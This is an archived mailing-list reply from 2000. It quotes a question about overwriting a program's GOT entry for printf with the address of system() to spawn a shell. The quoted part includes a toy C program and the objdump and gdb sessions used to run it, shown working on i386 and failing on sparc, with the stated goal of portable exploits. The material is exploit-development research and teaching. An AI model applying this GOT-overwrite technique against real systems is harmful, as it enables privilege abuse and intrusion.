Vulnerability Development mailing list archives
Re: Linux sparc & GOT
From: Guy Cohen <guy () CRYPTO ORG IL>
Date: Sun, 10 Dec 2000 10:37:04 +0200
I think you can find something at: www.multimania.com/ouah/archspan.html a document titled "Architecture spanning shellcode" by eugene () subterrain net. Michel Kaempf <maxx () VIA ECP FR> wrote:
The following message by Rafal Wojtczuk: http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-02- 01&msg=199801301709.SAA12206 () galera icm edu pl describes techniques capable of defeating Solar Designer's non-executable stack patch. The little program below exploits the first technique described in Section III: it overwrites the GOT entry of the printf() function with the address of the libc system() function, and therefore does not printf() the string /bin/sh, but runs /bin/sh instead thanks to system(). % cat got.c #include <stdio.h> #include <stdlib.h> int main( int argc, char * argv[] ) { unsigned long ul_printf; unsigned long ul_system; if ( argc != 3 ) { return( -1 ); } ul_printf = strtoul( argv[1], NULL, 0 ); ul_system = strtoul( argv[2], NULL, 0 ); *((unsigned long *)ul_printf) = ul_system; printf( "/bin/sh" ); return( 0 ); } When running on Linux i386, the program works like expected: % uname -sm Linux i686 % gcc -o got got.c % objdump -R got | grep printf 08049530 R_386_JUMP_SLOT printf % gdb got (gdb) break main (gdb) run (gdb) p system 0x163300 (gdb) q % ./got 0x08049530 0x163300 sh-2.03$ Nice, a shell. On Linux sparc, it does not work like expected: % uname -sm Linux sparc64 % gcc -o got got.c % objdump -R got | grep printf 0000000000021a04 R_SPARC_JMP_SLOT printf % gdb got (gdb) break main (gdb) run (gdb) p system 0x7007a528 (gdb) q % ./got 0x0000000000021a04 0x7007a528 /bin/sh No shell, but a printf(). The PLT (Procedure Linkage Table), the GOT (Global Offset Table) are not the same on i386 and sparc. When disassembling the linker code on both architecures, or comparing the `objdump -R' and `objdump -T' outputs, the results are obviously different. Question is: is there a know way to achieve the same technique on Linux sparc? I know the non-executable stack patch only works on i386 architectures, but maybe something similar could be implemented in the future for sparc processors, and anyway, the ultimate goal is to be able to write portable exploits, working on both sparc and i386 architectures without modifications. Thanks, -- MaXX
Current thread:
- Linux sparc & GOT Michel Kaempf (Dec 10)
- Re: Linux sparc & GOT Guy Cohen (Dec 11)